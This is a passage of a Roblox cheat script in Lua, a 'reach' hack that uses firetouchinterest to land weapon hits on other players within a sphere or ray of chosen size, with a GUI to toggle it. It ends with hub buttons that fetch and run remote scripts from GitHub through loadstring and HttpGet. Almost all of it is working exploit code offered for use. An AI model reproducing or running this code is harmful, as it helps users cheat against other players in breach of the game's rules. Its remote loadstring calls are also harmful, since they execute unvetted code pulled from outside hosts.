		end
		game:GetService("TweenService"):Create(Frame_3,TweenInfo.new(0.12,Enum.EasingStyle.Linear),goal):Play()
	end
end)
TextButton_2.MouseButton1Click:connect(function()
	if reachType == "Sphere" then
		reachType = "Line"
	else
		reachType = "Sphere"
	end
	TextButton_2.Text = reachType
end)
TextButton.MouseButton1Click:connect(function()
	trueActive = false
	ScreenGui:Destroy()
end)
game:GetService("UserInputService").InputBegan:connect(function(inp,gpe)
	if gpe then return end
	if inp.KeyCode == Enum.KeyCode.H then
		ScreenGui.Enabled = not ScreenGui.Enabled
	end
end)

local plr = game.Players.LocalPlayer

local function onHit(hit,handle)
    local victim = hit.Parent:FindFirstChildOfClass("Humanoid")
	    if victim and victim.Parent.Name ~= game.Players.LocalPlayer.Name then
		if dmgEnabled then
	        for _,v in pairs(hit.Parent:GetChildren()) do
	            if v:IsA("Part") then
	                firetouchinterest(v,handle,0)
	                firetouchinterest(v,handle,1)
	            end
			end
		else
			firetouchinterest(hit,handle,0)
			firetouchinterest(hit,handle,1)
		end
    end
end

local function getWhiteList()
    local wl = {}
    for _,v in pairs(game.Players:GetPlayers()) do
        if v ~= plr then
            local char = v.Character
            if char then
                for _,q in pairs(char:GetChildren()) do
                    if q:IsA("Part") then
                        table.insert(wl,q)
                    end
                end
            end
        end
    end
    return wl
end

game:GetService("RunService").RenderStepped:connect(function()
    if not active or not trueActive then return end
	local s = plr.Character and plr.Character:FindFirstChildOfClass("Tool")
	if not s then visualizer.Parent = nil end
    if s then
        local handle = s:FindFirstChild("Handle") or s:FindFirstChildOfClass("Part")
		if handle then
			if visualizerEnabled then
				visualizer.Parent = workspace
			else
				visualizer.Parent = nil
			end
			local reach = tonumber(TextBox.Text)
			if reach then
				if reachType == "Sphere" then
					visualizer.Shape = Enum.PartType.Ball
					visualizer.Size = Vector3.new(reach,reach,reach)
					visualizer.CFrame = handle.CFrame
		            for _,v in pairs(game.Players:GetPlayers()) do
		                local hrp = v.Character and v.Character:FindFirstChild("HumanoidRootPart")
		                if hrp and handle then
		                    local mag = (hrp.Position-handle.Position).magnitude
		                    if mag <= reach then
		                        onHit(hrp,handle)
		                    end
		                end
					end
				elseif reachType == "Line" then
					local origin = (handle.CFrame*CFrame.new(0,0,-2)).p
		    		local ray = Ray.new(origin,handle.CFrame.lookVector*-reach)
					local p,pos = workspace:FindPartOnRayWithWhitelist(ray,getWhiteList())
					visualizer.Shape = Enum.PartType.Block
					visualizer.Size = Vector3.new(1,0.8,reach)
					visualizer.CFrame = handle.CFrame*CFrame.new(0,0,(reach/2)+2)
		    		if p then
		    		    onHit(p,handle)
		    		else
		    		    for _,v in pairs(handle:GetTouchingParts()) do
		    		        onHit(v,handle)
		    		    end
		    		end
				end
			end
        end
    end
end)
end) 

Tab:CreateButton("LollyPop Hub",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/lollypophub/main/lollypophubV5.6",true))()
end) 

Tab:CreateButton("obby GodMode",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/ignore-touchinterests/main/main",true))()
end) 

Tab:CreateButton("1hooaczx1",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/hooaczx/Script/main/1hooaczx1"))()
end) 

Tab:CreateButton("My Script",function()
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/hooaczx/Script/main/My%20Script"))()
end) 
